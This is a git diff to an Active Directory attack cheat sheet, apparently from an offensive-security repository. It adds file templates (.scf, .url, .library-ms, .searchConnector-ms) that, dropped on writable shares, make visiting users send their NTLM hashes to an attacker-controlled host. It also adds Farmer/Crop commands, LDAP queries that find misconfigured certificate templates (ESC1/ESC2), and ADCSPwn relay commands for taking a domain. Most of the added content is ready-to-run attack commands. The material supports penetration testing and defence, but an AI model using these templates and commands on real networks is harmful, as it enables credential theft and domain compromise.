diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 2b9811e..b3e3f24 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -16,6 +16,10 @@ - [PrintNightmare](#printnightmare) - [Open Shares](#open-shares) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) + - [SCF Files](#scf-files) + - [URL Files](#url-files) + - [Windows Library Files](#windows-library-files) + - [Windows Search Connectors Files](#windows-search-connectors-files) - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo) - [Find vulnerable GPO](#find-vulnerable-gpo) @@ -65,6 +69,7 @@ - [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [Active Directory Certificate Services](#active-directory-certificate-services) - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) + - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -709,6 +714,22 @@ Requirements: ### SCF and URL file attack against writeable share +Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) + +```ps1 +# Farmer to receive auth +farmer.exe [seconds] [output] +farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely +farmer.exe 8888 60 # one minute + +# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks +crop.exe [options] +Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico +Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec +``` + +#### SCF Files + Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` ```powershell @@ -719,6 +740,8 @@ IconFile=\\10.10.10.10\Share\test.ico Command=ToggleDesktop ``` +#### URL Files + This attack also works with `.url` files and `responder -I eth0 -v`. ```powershell @@ -729,6 +752,53 @@ IconFile=\\10.10.10.10\%USERNAME%.icon IconIndex=1 ``` +#### Windows Library Files + +> Windows Library Files (.library-ms) + +```xml + + + @windows.storage.dll,-34582 + 6 + true + imageres.dll,-1003 + + {7d49d726-3c21-4f05-99aa-fdc2c9474656} + + + + true + false + + \\\\workstation@8888\\folder + + + + +``` + +#### Windows Search Connectors Files + +> Windows Search Connectors (.searchConnector-ms) + +```xml + + + imageres.dll,-1002 + Microsoft Outlook + false + true + \\\\workstation@8888\\folder.ico + + {91475FE5-586B-4EBA-8D75-D17434B8CDF6} + + + \\\\workstation@8888\\folder + + +``` + ### Passwords in SYSVOL & Group Policy Preferences @@ -1808,6 +1878,8 @@ Exploitation: * Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates ```ps1 Certify.exe find /vulnerable + or + PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' ``` * Use Certify to request a Certificate and add an alternative name (user to impersonate) ```ps1 @@ -1827,6 +1899,19 @@ Exploitation: **NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints. +#### ESC2 - Misconfigured Certificate Templates + +Requirements: +* Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) + +Exploitation: +* Find template + ```ps1 + PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local' + ``` +* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). + + #### ESC8 - AD CS Relay Attack > An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. @@ -1869,7 +1954,26 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # Mimikatz mimikatz> lsadump::dcsync /user:krbtgt ``` +* Version 3: ADCSPwn + ```powershell + https://github.com/bats3c/ADCSPwn + adcspwn.exe --adcs --port [local port] --remote [computer] + adcspwn.exe --adcs cs.pwnlab.local + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local + # ADCSPwn arguments + adcs - This is the address of the AD CS server which authentication will be relayed to. + secure - Use HTTPS with the certificate service. + port - The port ADCSPwn will listen on. + remote - Remote machine to trigger authentication from. + username - Username for non-domain context. + password - Password for non-domain context. + dc - Domain controller to query for Certificate Templates (LDAP). + unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . + output - Output path to store base64 generated crt. + ``` ### Dangerous Built-in Groups Usage @@ -2914,4 +3018,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) * [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) * [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf) -* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) \ No newline at end of file +* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) +* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/)